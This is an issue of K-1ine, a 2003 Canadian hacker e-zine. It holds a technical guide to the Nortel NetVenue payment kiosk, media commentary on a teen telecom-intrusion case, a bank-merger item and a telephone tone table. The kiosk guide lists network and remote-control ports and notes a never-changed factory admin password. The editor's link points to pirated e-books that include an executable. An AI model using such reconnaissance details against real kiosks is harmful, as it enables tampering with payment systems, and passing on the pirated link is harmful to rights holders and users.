__ _____ __ ___ _ ______ __ _ _ __ ___ / _ __ ____ _ ( ) ___)\ /______ ______ _________ \ / ___ _____ ___)\ ___ __. _____ | /_ \ | /_ / | ___\ | (/ || // _ | | _ __ __ _ _ _\\ | | _______ |:(/ ( ) | | ( ) ) \/_ \ /( )\ ( ) \\| | /_ ____ ||\\ | | | | | | ) ) / ___) \\ | //__ || \\ | | | | | | | | \ (___ __ _ \) | // || \\_ __| |__| |__| | | |_ \_______ __ | |// ____ __/ | \___ ____ _ _ _ _ _ __ ______) | (/ / __ __ )/ \ \| | / / \ \ (\_____/ /___ _ ___ _ ____ \ ) \____ _____ __ __ Beat up a whiney Emo Kid _ _ ( 38 ) | | c/a 4.2003. _________________________________________________________________________________ � .- Words from the Editor -. � | *: [-] Introduction ............................................ The Clone :* *: (-) Contact Information ..................................... The Clone :* *: (-) Link of the Month ....................................... Phlux :* *: (-) K-1ine Mirrors .......................................... The Clone :* *: (-) GHU.CA Switching Hosts .................................. The Clone :* *: (-) Toronto 2600 News - NOR/\D Radio ........................ Caesium :* _________________________________________________________________________________ � .- Documents -. � | *: (x) 'A Guide to the Nortel NetVenue Terminal' ................ Magma/Clone :* *: (x) 'When a Journalist and a Prosecutor Lie to the Public++' . The Clone :* *: (x) 'First Data and Concorde: The World's Biggest Banks Merge' MsO :* *: (x) 'Misc Tones Used In National Networks' ................... TiTaNiA :* *: (x) 'Perl Code for Security Auditing Yahoo E-mail Passwords' . GrassMunk :* *: (x) 'Fucking With Peoples Sensibilities' ..................... Caes / Coer :* *: (x) 'BloodFlame's Guide to Eating Free' ...................... BloodFlame :* _________________________________________________________________________________ � .- K-1ine News Bytes -. � | *: (x) 'Voicemail Hackers Phone It In' .......................... Wired News :* *: (x) 'TIME-TRAVELER BUSTED FOR INSIDER TRADING' ............... Yahoo! TV :* _________________________________________________________________________________ � .- Conclusion -. � | *: [-] Credits ................................................. The Clone :* *: [-] Shouts .................................................. The Clone :* _________________________________________________________________________________ Welcome to the latest issue of K-1ine #38 'Beat up a whiney Emo Kid'. I would like to thank everyone who submitted articles to me - you sent me so many! Enjoy this issue of K-1ine zine, and if you forget to send me more articles in the future, I will hold your family responsible for any pains that you cause me and my colleagues. Also, if you haven't noticed, I have added a section called "News Bytes" that will contain interesting and K-1ine worthy news articles that myself or others have find across the Internet. Please do not submit News Bytes and expect to have your name on the credits. That's just fucking lame. If you're going to submit something, submit an article in addition to the news story. I wouldn't normally add this disclaimer, but I know of a lot of lazy people who will do anything to get their damn nicknames whored. Now do yourselves a favor and... Have a Super Extra Corporate Day! -` --> Contact Information; Comments/Questions/Submissions: theclone@hackcanada.com Check out my site: (Nettwerked) http://www.nettwerked.net - ----------------------------------------------------------------------- --=[ LINK OF THE MONTH ]=-- Every month I post one really great "link of the month" on every issue of K-1ine magazine. The link can be anything in the technology industry, music scene, rave scene, punk scene, or even a good article you read on a news site. I'll be taking submissions via e-mail or IRC right away; so get your links in and maybe you'll see it in the next issue of K-1ine! For the month of April, the link of the month is: https://filez.mojo.cc/Mojo_BookShelf/SciFi%20&%20Fantasy/DUNE%20(F.H.)%20All%208%20Books/ "All 8 Dune Books in Digital Format" [... one is an .exe the other are .pdf's] [submitted by: Phlux] -- K-1ine Mirrors: http://www.mirrors.wiretapped.net/security/info/textfiles/k1ine/ (Now mirrored in two places, one in Belgium and another in Sydney) "Wiretapped.net is an archive of open source software, informational textfiles and radio/conference broadcasts covering the areas of network and information security, network operations, host integrity, cryptography and privacy, among others. We believe we are now the largest archive of this type of software & information, hosting in excess of 20 gigabytes of information mirrored from around the world." -- http://www.hackcanada.com/canadian/zines/index.html#K-1ine Hack Canada - Canadian H/P - E-Zines -- http://www.stealthiscomputer.org/k-1ine.html Steal This Computer - K-1ine Archive -- http://www.to2600.org Toronto 2600 - K-1ine Archive --- [ GHU.CA Switching Hosts ] For those of you who have been trying to reach GHU.CA for the past several days without any luck, it's because Magma (its founder and webmaster) has switched over from a shitty host, to hosting from StealThisComputer.org! Yes, that is correct. Our good pal Wizbone has graciously adopted ghu.ca and given it a safe place to live. Lets all tell Wizbone how much we adore his kindness. E-mail Wizbone: wizbone@stealthiscomputer.org, Subject "We Lub joo Wizzy!" - - [ Toronto 2600 News - NOR/\D Radio ] By: Caesium http://www.to2600.org/norad.php NORAD Radio is a new internet weekly radioshow idea conceptualized from myself, caesium. The show will feature a panel of Toronto 2600 members, with frequent appearances by The Clone. The show will be hosted by dec0de, produced by caesium and infrastructure engineering by grinthock. We plan to discuss relevant issues to the Canadian underground and various other interests. This show will be streamed by several volunteers using SHOUTcast MP3 streaming technology (amoungst several other techno- logies). This biweekly radio show will also be a call-in show which should prove interesting. Live, uninhibited, underground. We are sure with the right help and suggestions that we can turn this show into a success. We are currently designing and engineering the infastructure that will make this live, nationally produced radio show possible. We hope to have it pilot sometime in May or June. If you have any ideas, concepts or otherwise, please contact caesium at caesium@toronto2600.org. -- A Guide to the Nortel NetVenue Terminal * Written by: Magma and The Clone * Thursday, April 17, 2003 > Magma's web-site: www.ghu.ca > The Clone's web-site: www.nettwerked.net Dedicated to Nettwerked.net's 4 year anniversary on the Internet. Disclaimer: This document was written as a source for information pertaining to the Nortel NetVenue Internet Kiosk Terminal. We have made every attempt to gather as much information as possible from various public sources, and from our own personal (comp- letely legal) research. We wrote this NetVenue document to teach the Internet community about this interesting technology. If you abuse any of the details mentioned on this paper, then you are responsible for your actions. We won't be held accountable. T a b l e o f C o n t e n t s * An Introduction to the NetVenue * Hardware Specifications * Software Specifications * Hardware Architecture Details * Software Architecture Details * Photographs in Toronto * Locations in Canada * The Conclusion to this Paper * Credits and Shout Outs - An Introduction to the NetVenue: It is believed by some that Internet Kiosks, are the future of public pay telephone. Despite huge profit losses by telecommunications giant by Nortel Networks which saw a third quarter loss of $1.8 (US) billion, has slashed its work force, and has hacked away at its product lines, it still continues to exist as a market leader. One such product that Nortel Networks has recently stopped manufacturing and licensing to markets (but many resellers still offer in parts of Canada and the United States) is the NetVenue Terminal. The NetVenue is a robust, low maintenance next-generation Millennium public access terminals which is used to deliver IP-based services and applications. The NetVenue is available in two platforms; the "Java Terminal" (Windows-NT based) and the "Mac Terminal" (MAC OS-9 / X based), and offer colour touch screens with card readers, receipt printers for e-commerce, a docking station enclosure house, a Debit Machine, a handset for POTS services, a keyboard and trackpad for Internet surfing capabilities. The broad classes of services most important to public IP access are currently seen as: Messaging services like e-mail Internet access (Web browsing), Form-entry services for markets such as banking and government services, Electronic Commerce applications such as ticketing and virtual malls, and Entertainment for gaming, online gambling, and Cyber-Sex0ring in chat rooms. This paper will discuss the technical aspects of this beautiful piece of technology by outlining and describing the hardware, the software (applications), locations, photographs, and more! We hope you enjoy this document, and we look forward to your feedback and updates. I certainly wish we could of released this document when the NetVenue was a brand new product, but it wasn't until recently that Magma and The Clone were able to acquire most of the details on it. [ Hardware Specifications ] Mac Terminal Details * Credit Card Support: NDCSNS Millennium * Interac Debit Card Support: YES * Stored Value Smart Card Support: YES * Receipt Printer: Swecoin * Remote Control: Timbuktu Pro * Hardware Platform: PowerPC 700 (or better) series * Additional Serial Ports: Port Juggler / Doubler * Power Reset: Via Payphone Rebound Device PC Terminal Details * Credit Card Support: SNS Millennium ACS * Interac Debit Card Support: YES * Stored Value Smart Card Support: YES * Receipt Printer: Swecoin * Remote Control: NetOp * Hardware Platform: Intel Celeron 300A (or better) series * Additional Serial Ports: PCI Serial Card (2 port or 4 port) * Power Reset: Hardware watchdog [ Software Specifications ] Mac Terminal Details * Network-based: YES * Java Services: NO * Native Services: NO * Web Browser: Customized Netscape Navigator 6X/7X/etc. * Web Service content: HTML 4.0+ / Java 1.1+ Applets Dynamic * API Support: HTML API * Operating System: MacOS 8.5.1 / 9 / or X. * Local Cache: Oracle Lite * Number of Attract Loops: Up to 61 * Printing in Progress Dialog: YES * Software Volume Control: NO * Graphic Types in menus: GIF, JPG, PICT * Video Display: 14" LSD * Progress Indicator: YES * Disable API per service: NO * Transition Effects: QuickTime Video * Sound Services: QuickTime PC Terminal Details * Network-based: YES * Java Services: YES (JDK 1.2) * Native Services: YES (Active X) * Web Browser: Internet Explorer 5X/6X * Web Service content: HTML 4.0+ / JavaScript 1.2+ * API Support: ActiveX API, HTML API, and JAVA API * Operating System: Windows NT Workstation 4.0 (or Windows 2000) * Local Cache: Java * Number of Attract Loops: Up to 61 * Printing in Progress Dialog: YES * Software Volume Control: YES * Graphic Types in menus: GIF, JPG * Video Display: 15" LSD * Progress Indicator: YES * Disable API per service: YES * Transition Effects: Java Media Framework * Sound Services: Windows Media Player [ Hardware Architecture Details ] Remote Administration Functions: All updates to the Nortel NetVenue Terminal are done through the software known as 'NetOp Remote Control', which is used at the carrier's NOC (Network Operations Centre), or at the owner's location of business. NetOp Remote Control allows the system administrator to control the Nortel NetVenue Terminal's keyword, mouse, and basic to advanced functions all via a user- friendly Windows GUI. Details on ordering this product are available at: this web-page. Be sure to request a FREE TRIAL, and try it before you buy it. NetOp Remote Control is quite an interesting piece of software. Credit Card Transactions: All credit card transactions in the Nortel NetVenue are processed via the customized payment gateways which are completely supported by Nortel Network's Kiosk internal terminal software. The NetVenue uses a third-party clearinghouse to authorize and clear or deny credit cards for Pay-per-Use and purchases via service APIs. The Nortel NetVenue will communicate with the credit card clearinghouse's host over TCP/IP, and a proprietary protocol that is completely defined by the particular authorization company. Shared Network Services: - Canada - Shared Network Services (SNS) provides credit card authorizations in Canada. Transactions are configured to be automatically settled by SNS who provide a settlement file back to the 'NetVenue Management System'. SNS also provides credit card transaction reports to the Net- Venue Kiosk merchant clients. - United States - NDC (formerly 'Global Payment Solutions') provides card authorizations for U.S. dollar tran- sactions and U.S. merchant clients. ACS provides automatic settlement for these credit card transactions. Millennium Authorization: Card authorizations via the Kiosk can be performed by the payphone component of the terminal if the Netvenue payphone is in direct communication with the Nortel 'Millennium Manager'. These authorizations are for fixed amounts configured on the Millennium Manager. This amount is also fixed across all services that use Millennium card authorizations. The NetVenue Smart Card Service: Interac Debit card support is provided by a Debit Software Component in the Java Terminal in conjunction with a third party device manufactured by a company known as Nova Enterprise Solutions. The support provides for multiple merchant debit card transactions. This means that more than one merchant can accept debit cards as payment on a single terminal. The Nova device communicates with an "IVI Vending Pad" for PIN entry and prompting. It also clears the debit card to the financial institution via a separate physical connection to the bank's secure host computer. The Vending Pad provides most of the security since it contains the various security keys and performs all of the encryption/decryption of messages sent to the particular bank. The current implementation provides basic debit card support for a small number of terminals due to the high costs and maintenance: each Nortel NetVenue terminal requires a separate PayBox and a Datapac '3201' (transaction protocol) line for NUI- based connections. To learn more about the Datapac system, be sure and refer to this Hack Canada document. The NetVenue Keyboard: The NetVenue's keyboard kinda reminds me of the Millennium TTY Terminals found in most public places in Canada. The keyboard has a mouse-button near the credit card slot for moving the mouse cursor, and a separate clicker button. It has a QWERTY keyboard with many of the same keys you'd find on an average 101, and two types of data jacks; RJ-11 for dial up connections, and an Ethernet jack for tappin' on to the high speed with your laptop or PDA. The NetVenue terminal maps character keys according to the letters on the dialpad, and characters that are not supported such as "!" are not mapped to any input. Any keyboard buttons that are not valid, provide no audible response to the user. For example, if the user presses "!" on the keyboard, this has no effect within the GUI application. For a visual depiction of the keyboard, scroll down and view the photographs. Volume (up and down) buttons: You guessed it; the volume buttons are used for increasing and decreasing the volume in the NetVenue's handset. It doesn't affect any of the terminal's multimedia audio volume as they are set to a factory setting or pre-set by the administrator. Next Call button: This button acts similar to the existing Millennium payphone's "Next Call" button. The Next Call button different has results depending on when it's pressed. During call set up, this key acts as a correction. If the customer is typing in a number and they press the "Next Call" button, the dialed number is blanked out. If the user is on a call, pressing this key allows the user to initiate another call using any existing credit. The next call may also initiate additional credit authorization. Language button: The language is primarily in English, unless the phone is located in places like Quebec, then it would be French by default. You can change the language the NetVenue displays and says (on the voice prompts) by pressing the Language Key once. The language service is synchronized with the Multimedia primary language via the "PC-to-Payphone" interface protocol. Forgotten Card Alarm: The forgotten card alarm audible sound file is played on the PC's multimedia speakers when a card is left in the card reader at least 5 seconds after the customer hangs up the receiver on the Net- Venue. This sound file is configurable via the back-end Multimedia Server, so if you ever wanted to change it, you could. It would be especially entertaining to change the forgotten card alarm from the usual "dee-doo-dee-doo" to "hey idiot, you forgot your card in me!" :) Rate Table Updating: On a regular basis, the Nortel NetVenue will connect via POTS copper lines to the remote server running Millennium Manager to update its rate tables and software (for upgrades, security patches, etc). How does the NetVenue know when to update its records? The NetVenue software runs on a task- list or 'cron', and usually updates at the same time every day. Sometimes the service provider will set the NetVenue to dial out to the Millennium Manager at various times throughout the week or month. [ Software Architecture Details ] Electronic Mail: The Nortel NetVenue has the ability to allow a user to check their e-mail through two ways; web-based services on the Internet (i.e. Hotmail) and through POP3. If a customer decides to check their e-mail through the POP3 protocol, Nortel NetVenue will politely prompt the user to enter their POP3 e-mail account ID and password. As soon as that information is entered, the user will then need to press the log on button and begin sending and receiving e-mail as well as deleting, replying to, printing (if applicable), moving, jumping to the next and/or previous message. However if the user messes up and enters either invalid login or password info, NetVenue will prompt them a few times before quitting. E-mail Attachments are not supported for reasons of security. Denying the user the ability to attach files, will significantly cut down on the chances of viruses and trojans being sent from the user. Service APIs: There are several API commands that can be used to access the NetVenue's functionality for reading cards, clearing cards, printing receipts, printing tickets, and dialing telephone numbers for the customer. For your convenience (heh), here are the API commands it uses. Remember, many of these commands require the Nortel NetVenue to have a laser printer installed. Don't even bother if it doesn't, mmmkay? "Print PostScript File" This command prints one or more PostScript files stored on the hard drive to the system laser printer. The Print PostScript File command is useful for printing forms such as insurance/government forms, etc. "Print Receipts / Coupons" This command (you guessed it!) prints receipts and coupons. Intriguing. "Print Current Web Page" This command prints the content of a HTML page to the system's default printer while a user is online. "Exit Service" This command will let you exit the service. "Print Ticket" (requires a ticket printer) This command lets you print tickets. Fun. "Dial Phone Number" This command by default will dial the telephone number as configured in the terminal database by the NetVenue administrator. One can enter any number they wish here, including extensions for voice-mail and/or customer service on PBX's. "Read, Clear Card" This command tells the NetVenue terminal to request that the user insert their credit / debit-card for transactions. Only the administrator can configure the "Result URL" in the server using the administr- ation tool which is user ID and password protected (set to a factory default, and never changed). Encryption: The Nortel NetVenue uses Secure Sockets Layer (SSL 128bit) over Internet transactions that is provided by the Internet Explorer / Netscape browsers. For Datapac based transactions, proprietary encryption over the data lines is used as well as encryption at the remote server. If the administrator does not have an SSL compatible server, the customer will NOT be able to use SSL features on the NetVenue. NetVenue's TCP/IP Ports & Protocols: The following is a list of network protocols and ports that are used by the NetVenue Terminal... * STCP/UDP, port 53 -- Used by the NetVenue Internet Services. Also used in the operating system, and Java software for the PC version of the NetVenue. * FTP port, 21 -- There is no FTP server is installed on the NetVenue terminal. Bunk. :-/ * LPRTCP, port 515 -- This is used by the "Windows TCP/IP Printing Service" when printing Web pages from within a certain Web service and/or by the system's default laser printer. * BOOTP/DHCPUDP, port 68 -- Not currently enabled. * Web-Server, port 80, 8080 - Used for outgoing Internet usage. * TCP, port 443 (SSL) -- Used primarily by the Web service. HTTP can also use other ports, depending on how the web server is configured. * Oracle's Thin Client ODBC driver / JDBC, Port 1521 -- JDBC/TNS/SQL*net Used by the Java software for connections to its security database. * Nortel Java S/WGPS, Port 15126 -- For Global Payment Solutions for all United States credit card authorizations. * SNS, Port 1076 -- for Shared Network Services (SNS) for all Canadian credit card authorizations. * PAP, Port 9100 -- Uses TCP/IP sockets for printing postscript files directly from the "HTML API" command. * Timbuktu Proprietary UDP (Mac only), port 407 * Observation, Control, File Transfers, port 1417, 1418, 1419, 1420 * Notification, Chat, Intercom, ports 1023. * NetOp Proprietary TCP, port 6502 -- Uses a single port - Photographs in Toronto: The following photographs were taken at Union Station in Toronto by Dec0de (of Toronto2600 - www.toronto2600.org) http://www.nettwerked.net/netvenue1-big.jpg (Side shot of the NetVenue's keyboard. Very impressive... super-hero like-even!) http://www.nettwerked.net/netvenue2-big.jpg (Front shot of the NetVenue Terminal.) http://www.nettwerked.net/netvenue3-big.jpg (Check out the keyboard on this baby.) http://www.nettwerked.net/netvenue4-big.jpg (Very nice screen / dial-pad shot. Phearsome.) - Locations in Canada: As far as I know, the only locations that were ever noted was the one in Toronto (pictures above), and one in Montreal. Both of these were services offered by Bell Canada. At the end of 2002, the contract that Bell had with Nortel expired. Bell decided not to renew the contract and decided to go with another company (King Products) and is now offering public services using the cc100 terminals. The cc100 terminals are interesting, but lame in comparison to the vast features the NetVenue offers. Western Canada MAY still adopt the NetVenue for services; particularly by telephone companies such as Telus Communications. The United States is said to have many NetVenue terminals in use by small telecom service providers. A friend of a friend in New Jersey works for a company that sells these NetVenue's, so eastern USA is definitely utilizing these. The Conclusion to this Paper: There you have it; the most comprehensive document you've probably ever read on the Nortel NetVenue Terminals. We sincerely hope you enjoyed this paper, and we hope to hear your feedback, and receive any tips and/or corrections. The future of the payphone industry appears to be that of the Internet Kiosk terminals. Will they last? Only time will tell. Credits and Shout Outs: Magma and The Clone would like to give credit to Dec0de for his excellent photographs. Shout Outs: Hack Canada, The Grasshopper Unit / Nettwerked, Toronto 2600, StealThisComputer.org, PacketNinja.ca, SmartestGirls.com, and lastly to the Nortel Networks NetVenue engineers. -- Reporter Comments: When a Journalist and a Prosecutor Lie to the Public * Date: Tuesday, April 8, 2003 * Introduction by: The Clone * Web-site: WWW.NETTWERKED.NET This file is a continuing saga. Read the original article first. Introduction: I recently received an e-mail from a Toronto Star reporter by the name of Rachel Ross, who found the Nettwerked article pertaining to the Alberta prosecutor Steven Bilodeau, and the mis-information spread within the pages of the Edmonton Journal by editor Keith Gerein. She had some comments to make, and some information to share regarding the claim that Steven Bilodeau made regarding the Massachussetts teenager's apparent airport / power-grid shenanigans. So now it seems that the false claim Steven Bilodeau made was actually loosely based off of the truth. One thing though; in the Edmonton Journal article, Steven Bilodeau claimed that the Massachussetts teenager was able to shut down the power-grid and airport lighting system easily just by hooking onto a "switch box" with a device - it sounded all too similar to a lineman's handset. So the truth is the teenager disabled the lighting system at an airport and supposedly interrupted telephone service at a nearby town in Rutland. HOWEVER, I don't see where it says anything about disabling power, either than the article making a really bad analogy: "Just as disabling a circuit breaker box blacks out an entire house, so disabling a loop carrier system cuts off all communications with the telephone lines it services". Heh. Thanks to a REAL reporter Rachel Ross from the Toronto Star doing her homework, we now know that we should never take what we read in the media as absolute truth just because it happens to be printed word. Rachel, the Canadian hacker community salutes you. Steven Bilodeau, shame on you for telling lies. Keith Gerein, shame on you for spreading the blatant libel in a city-wide newspaper. Don't think you're getting off that easy, Keith; I've convinced several of my close friends, family members, and readers to boycott the Edmonton Journal for the bullshit it published! I want to send a special thanks to Anonymous_Hero for the original contribution to this story. When readers like you speak out, everyone wins. The Truth... From RRoss@thestar.ca Fri Mar 28 21:44:33 2003 Return-Path: Received: (qmail 22870 invoked by alias); 28 Mar 2003 21:44:33 -0000 Delivered-To: 6-theclone@hackcanada.com Received: (qmail 22865 invoked from network); 28 Mar 2003 21:44:32 -0000 Received: from unknown (HELO MAILRELAY.thestar.ca) ( by 0 with SMTP; 28 Mar 2003 21:44:32 -0000 Received: from [Masked] by MAILRELAY.thestar.ca with ESMTP id ukhbbaaa for theclone@hackcanada.com; Fri, 28 Mar 2003 16:44:30 +-0500 Received: by exchange.thestar.ca with Internet Mail Service (5.5.2653.19) id ; Fri, 28 Mar 2003 16:44:40 -0500 Message-ID: <926E485C3A6E594C94F2745357AC8B55170DCC@mail4.thestar.ca> From: "Ross, Rachel" To: "'theclone@hackcanada.com'" Subject: Comment Re: Issue 37 Date: Fri, 28 Mar 2003 16:44:15 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/mixed; boundary="==_21443078399065==_" X-AntiVirus: Checked for viruses by Gordano's AntiVirus Software X-AntiSpam: Checked for restricted content by Gordano's AntiSpam Software Status: RO X-Status: A Content-Length: 9028 Lines: 197 I found the article 'When a Journalist and a Prosecutor Lie to the Public' interesting and decided to look into the "tale" of the teen hacker who allegedly shut down the power grid and runway lights. At minimum, it sounded a little ridiculous. I think I know the incident that the reporter was trying to describe. I've pasted a news story about the incident below. It appears as though the teen didn't take out a power grid, but he did manage to disable a remote control system for some runway lights. (I guess they could still run out there and switch the darn lights on the runway but what a pain in the ass.) Anyway, I just thought your readers might be interested in the real story. Cheers, Rachel P.S. All reporters do not suck. No really, we don't. Well, some of us TRY not to anyway. Teen hacker charged with disabling airport control tower telephones 18 March 1998 BOSTON, March 18 (AFP) - A teenage computer hacker was charged Wednesday with disabling telephones and control tower services at a Massachussetts airport, the Justice Department said. The incident last spring virtually shut down the Worcester, Massachussetts airport, and also interrupted phone service in the nearby town of Rutland. The lead federal investigator on the case, Secret Service Special Agent Michael Johnston said the case was one of the agency's "most significant computer fraud investigations," and had significant "national security ramifications." The charges unsealed Wednesday were the first brought by the federal government against a juvenile for computer crimes. "Computer and telephone networks are at the heart of vital services provided by the government and private industry, and our critical infrastructure. They are not toys for the entertainment of teenagers," said US Attorney Donald Stern, in a press release. "Hacking a computer or telephone network can create a tremendous risk to the public and we will prosecute juvenile hackers in appropriate cases, such as this one," Stern said. Under a plea agreement, prosecutors said the youth would receive two years' probation, during which he will not be allowed to own or use a computer modem. He must also pay restitution to the phone company and perform 250 hours of community service. Officials did not release the name of the youth because of his age. Prosecutors said the incident occurred March 10, 1997, when the teenager hacked into remote computers called "loop carrier systems" that move voice and data transmissions from older copper telephone lines to more sophisticated fiber-optic cables. "Just as disabling a circuit breaker box blacks out an entire house, so disabling a loop carrier system cuts off all communications with the telephone lines it services," Stern explained. Worcester Airport in eastern Massachusetts had no telephone service for six hours, nor did the airport's fire department or security system, the statement said. A remote control systems operating runway lights also failed. On the same day, the teenager also broke into a Worcester pharmacy computer and ordered it to transmit to his computer information on all prescriptions filled the previous week. --- First Data and Concorde - The World's Biggest Banks Merge CORPORATE NAME VOLUME BY STOCK DOLLAR First Data 23,697,300 813.1 Concord Efs INC 49,925,900 620.3 IBM 7,280,100 593.0 Citigroup 15,058,000 555.3 Altria Group 18,425,500 538.4 These were the top 5 stocks at close of April 2, 2003 on the New York Stock Exchange. This might not be of issue to anyone, but the top two companies on this list merged today. These companies are not IT, or even arms related. This merger announced today was of the two largest banking conglomerates in the world. First Data owns Western Union, and processes 7 out of every 10 credit card transactions in the world. Concord was their rival until a few hours ago. The banking world is not unlike the Internet. There are only 3 bank "backbones" that all other banks lease their access to Visa and Mastercard through. Like the clergy in the Catholic church, if you need to speak to God, or get a credit card authorized, you do it through them. Today's merger cuts this down to two. With the American people so caught up in the war, perhaps these banks believe no one is paying attention to Anti-trust legislation and homing in on the plight of the recently rescued Jessica Lynch instead. The new First Data is slated to generate $10 Billion in annual revenue. In an article with Reuters, First Data Chief Executive Charlie Fote said he was confident the deal would clear those hurdles. "We feel pretty good about the antitrust issue,". I think Bill Gates said the same thing once upon a time. -MsO -- I was at the store today and I mentioned how the US is using missiles with depleted uranium attached to them, and she looked at me and asked "uranium? IS that some flower or something?" -- Misc Tones Used In National Networks Brought to you by: TiTaNiA for those sexy canadians! Disclaimer: Results may vary. This list is current, but there is no standards for such tones. (they are kinda sorta in alphabetical order XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX COUNTRY/TONE FREQ(Hz)/CADENCE(s)econds)X XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX Albania (Republic of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.15 on 0.15 off Dial tone - 425 continuous Pay tone - 12000 Ringing tone - 425 1.2 on 4.65 off Special information tone - 425 0.2 on 0.2 off Call waiting tone - 425 0.2 on 0.6 off Algeria (People's Democratic Republic of) Busy tone - 450 0.5 on 0.5 off Ringing tone - 25//50 1.5 on 3.5 off Germany (Federal Republic of) Busy tone - I 425 0.48 on 0.48 off Busy tone - II 425 0.5 on 0.5 off Congestion tone - I 425 0.24 on 0.24 off Congestion tone - II 425 0.2 on 0.2 off Dial tone - 425 continuous Special dial tone - 425+400 continuous Holding tone - 425 0.15 on 0.15 off 0.15 on 8.0 off Payphone recognition tone - I 1633/1336 5x(0.2 on 0.2 off 0.2 on 2.0 off) Payphone recognition tone - II 900 0.2 on 0.2 off 0.2 on 0.2 off 0.2 on Ringing tone - I 425 1.0 on 4.0 off Ringing tone - II 425 0.25 on 4.0 off 1.0 on 4.0 off 1.0 on 4.0 off Special information tone - I 900/1400/1800 3x0.33 on 1.0 off Special information tone - II 950/1400/1800 3x0.33 on 1.0 off Warning tone - operator intervening 425 0.24 on 0.24 off 0.24 on 1.28 off Call waiting tone - I (2) 425 0.2 on 0.2 off 0.2 on 5.0 off Call waiting tone - II (2) 425 0.2 on 0.2 off 0.2 on 8.0 off Angola (Republic of) Busy tone - 400 0.5 on 0.5 off Congestion tone - 400 0.5 on 0.5 off Dial tone - 400 continuous Number unobtainable tone - 400 0.2 on 0.2 off Ringing tone - 25 1.0 on 5.0 off Waiting tone - 400 1.0 on 5.0 off Anguilla Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Recall dial tone - 350+440 3x(0.1 on 0.1 off) + continuous Number unobtainable tone - 480+620 0.25 on 0.25 off Payphone recognition tone - 1600/1143 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 440+480 2.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - operator intervening 450 0.2 on 0.2 off 0.65 on 0.2 off Waiting tone - 440 1x(0.5 on 10.0 off 0.5 on) Antigua and Barbuda Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Pay tone - 622 0.136 on 0.136 off Ringing tone - 440+480 2.0 on 4.0 off Special information tone - announcement Call waiting tone - 480 1x(0.6 on 10.0 off) Saudi Arabia (Kingdom of) Busy tone - 425 0.5 on 0.5 off Congestion tone - 425 0.25 on 0.25 off Conference tone - 425 0.5 on 2.0 off 0.5 on 15.0 off Dial tone - 425 continuous Payphone recognition tone - 1600/1200 0.2 on 0.2 off 0.2 on 4.0 off Ringing tone - 425 1.2 on 4.6 off Call waiting tone - 425 0.15 on 0.2 off 0.15 on 10.0 off Argentine Republic Busy tone - 425 0.3 on 0.2 off Congestion tone - 425 0.3 on 0.4 off Dial tone - 425 continuous End of three party service tone - 950/1400/1800 1x(3x0.33 on) Ringing tone - 425 1.0 on 4.0 off Service activated tone - 425 1.0 on 0.25 off Warning tone - operator intervening 1400 5x0.1 on 1.9 off Waiting tone - 425 0.4 on 0.2 off 0.4 on 4.0 off Call waiting tone - 425 0.3 on 10.0 off Aruba Busy tone - 425 0.5 on 0.5 off Confirmation tone - 425 continuous Congestion tone - 425 0.25 on 0.25 off Dial tone - 425 continuous Refusal tone - 425 0.06 on 0.06 off Ringing tone - 425 1.0 on 4.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Call waiting tone - 425 0.2 on 0.2 off 0.2 on 4.4 off Ascension Busy tone - 400 0.384 on 0.384 off Congestion tone - 400 continuous Dial tone - 350+450 continuous Number unobtainable tone - 400 continuous Ringing tone - 400+450 0.384 on 0.192 off 0.384 on 2.016 off Call waiting tone - 1400 1x(0.384 on) Australia Busy tone - 425 0.375 on 0.375 off Congestion tone - 425 0.375 on 0.375 off Conference tone - 425//525 1.0 on 15.0 off 0.36 on 15.0off Dial tone - 425x25//400+425+450 continuous Facilities tone - 425 continuous Intrusion tone - 425//525 continuous Number unobtainable tone - 425 2.5 on 0.5 off Payphone recognition tone - 1209/852 0.2 on 0.2 off 0.2 on 2.0 off Record tone - 1400 0.425 on 15.0 off Ringing tone - 400x25//400+425+450//4 0.4 on 0.2 off 0.4 on 2.0 off 00+450 Warning tone - operator intervening 900 0.5 on Call waiting tone - 425 0.2 on 0.2 off 0.2 on 4.4 off Austria Busy tone - I 420 0.4 on 0.4 off Busy tone - II (5) 450 0.3 on 0.3 off Congestion tone - I 420 0.2 on 0.2 off Congestion tone - II (5) 450 0.3 on 0.3 off Dial tone - 420//450 continuous Recall dial tone - 420 continuous Special dial tone - 380+420 continuous Negative indication tone - 380+420 0.4 on 0.4 off Number unobtainable tone - 950/1400/1800 3x0.33 on 1.0 off Pay tone - 852 1.5 on Positive indication tone - 380+420 1.0 on 5.0 off Payphone recognition tone - 1336/1633 0.2 on 0.2 off 0.2 on 2.0 off Ringing tone - 420//450 1.0 on 5.0 off Special information tone - 950/1400/1800 3x0.33 on 1.0 off Warning tone - operator intervening 420//450 0.15 on 0.15 off 0.15 on 1.95 off Waiting tone - 420 0.04 on 1.95 off Bahamas (Commonwealth of the) Busy tone - 480/620/420//400 0.5 on 0.5 off Ringing tone - 440/480//420/20//400 2.0 on 4.0 off Bahrain (State of) Acceptance tone - 425 0.06 on 0.06 off Busy tone - 425 0.375 on 0.375 off Congestion tone - 425 0.40 on 0.35 off 0.225 on 0.525 off Dial tone - 330x440 continuous Number unobtainable tone - 425 continuous Pay tone - 816/1209 O.125 on 1.5 off Ringing tone - 425 0.4 on 0.2 off 0.4 on 2.0 off Route tone - 425 0.06 on 0.06 off Call waiting tone - 425 0.2 on 0.6 off 0.2 on 5.0 off Bangladesh (People's Republic of) Busy tone - 450 0.2 on 0.3 off 0.7 on 0.8 off Congestion tone - 450 0.25 on 0.25 off Dial tone - 450 continuous Special dial tone - 450 0.4 on 0.4 off Howler tone - 3000 continuous Pay tone - 800/1900 continuous Ringing tone - 450 1.0 on 4.0 off Warning tone - operator intervening 450 0.20 on 0.02 off 0.20 on 1.40 off Call waiting tone - 450 3.0 on 10.0 off Barbados Busy tone - 480+620 0.5 on 0.5 off Congestion tone - 480+620 0.25 on 0.25 off Dial tone - 350+440 continuous Ringing tone - 440+480 